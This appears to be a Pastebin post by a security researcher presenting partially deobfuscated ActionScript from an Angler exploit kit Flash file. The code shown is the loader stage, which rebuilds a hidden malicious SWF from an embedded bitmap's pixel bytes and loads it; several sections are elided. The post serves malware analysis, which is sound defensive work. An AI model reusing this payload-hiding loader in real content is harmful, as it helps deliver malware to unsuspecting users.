Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Partially Deofuscated Angler EK flash exploit swf file
- *******
- Original obfuscated code: http://pastebin.com/nS0pGa1e
- *******
- *******
- package {
- import flash.display.*;
- import flash.system.*;
- import flash.utils.*;
- public class Document extends MovieClip {
- public function Document(){
- super();
- if (this["stage"]){
- this.functionStartExploit();
- } else {
- this["addEventListener"]("addedToStage", this.functionStartExploit);
- };
- }
- public function functionStartExploit():void{
- this["removeEventListener"]("addedToStage", this.functionStartExploit);
- var _localEmbeddedSWF:* = new flash.display.Loader();
- _localEmbeddedSWF["loadBytes"](this.functionEmbeddedSWFFromBitmap());
- this["addChild"](_localEmbeddedSWF);
- }
- ...
- private function functionEmbeddedSWFFromBitmap(){
- var _localMaliciousByteArray:* = new flash.utils.ByteArray();
- var _localBitmap:* = new BitmapAsset()["bitmapData"];
- ...
- while (_localCounter2 < _localBitmap["width"]) {
- while (_localCounterNested < _localBitmap["height"]) {
- _localPixel = _localBitmap["getPixel"](_localCounter2, _localCounterNested);
- ...
- _localMaliciousByteArray["writeByte"]((_localPixel & 0xFF));
- _localMaliciousByteArray["writeByte"](((_localPixel >> 8) & 0xFF));
- _localMaliciousByteArray["writeByte"](((_localPixel >> 16) & 0xFF));
- ...
- _localCounterNested++;
- };
- ...
- _localCounter2++;
- };
- ...
- _localMaliciousByteArray["position"] = 0;
- return (_localMaliciousByteArray);
- }
- ...
- }
- }//package
- *******
- *******
- *******
- More FROM @neonprimetime security
- http://pastebin.com/u/Neonprimetime
- https://www.virustotal.com/en/USER/neonprimetime/
- https://twitter.com/neonprimetime
- https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment